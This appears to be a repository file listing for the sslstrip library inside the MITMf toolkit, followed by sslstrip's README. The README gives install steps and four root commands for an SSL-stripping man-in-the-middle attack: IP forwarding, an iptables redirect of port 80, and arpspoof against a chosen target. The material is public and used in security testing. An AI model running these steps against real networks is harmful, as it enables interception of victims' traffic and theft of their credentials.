MITMf/libs/sslstrip
2014-12-15 17:00:05 +01:00
..
__init__.py major changes for Responder integration 2014-12-05 04:18:29 +01:00
ClientRequest.py revamped appoison plugin and fixed some bugs 2014-12-15 17:00:05 +01:00
CookieCleaner.py major changes for Responder integration 2014-12-05 04:18:29 +01:00
COPYING.sslstrip major changes for Responder integration 2014-12-05 04:18:29 +01:00
DnsCache.py WPAD now integrated 2014-12-13 21:30:55 +01:00
README.sslstrip major changes for Responder integration 2014-12-05 04:18:29 +01:00
ServerConnection.py revamped appoison plugin and fixed some bugs 2014-12-15 17:00:05 +01:00
ServerConnectionFactory.py major changes for Responder integration 2014-12-05 04:18:29 +01:00
SSLServerConnection.py major changes for Responder integration 2014-12-05 04:18:29 +01:00
StrippingProxy.py major changes for Responder integration 2014-12-05 04:18:29 +01:00
URLMonitor.py revamped appoison plugin and fixed some bugs 2014-12-15 17:00:05 +01:00

sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 
attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing:
	* Unpack: tar zxvf sslstrip-0.5.tar.gz
	* Install twisted:  sudo apt-get install python-twisted-web
	* (Optionally) run 'python setup.py install' as root to install, 
	  or you can just run it out of the directory.  

Running:
	sslstrip can be run from the source base without installation.  
	Just run 'python sslstrip.py -h' as a non-root user to get the 
	command-line options.

	The four steps to getting this working (assuming you're running Linux) 
	are:

	1) Flip your machine into forwarding mode (as root):
	   echo "1" > /proc/sys/net/ipv4/ip_forward

	2) Setup iptables to intercept HTTP requests (as root):
	   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
	
	3) Run sslstrip with the command-line options you'd like (see above).

	4) Run arpspoof to redirect traffic to your machine (as root):
	   arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

More Info:
	http://www.thoughtcrime.org/software/sslstrip/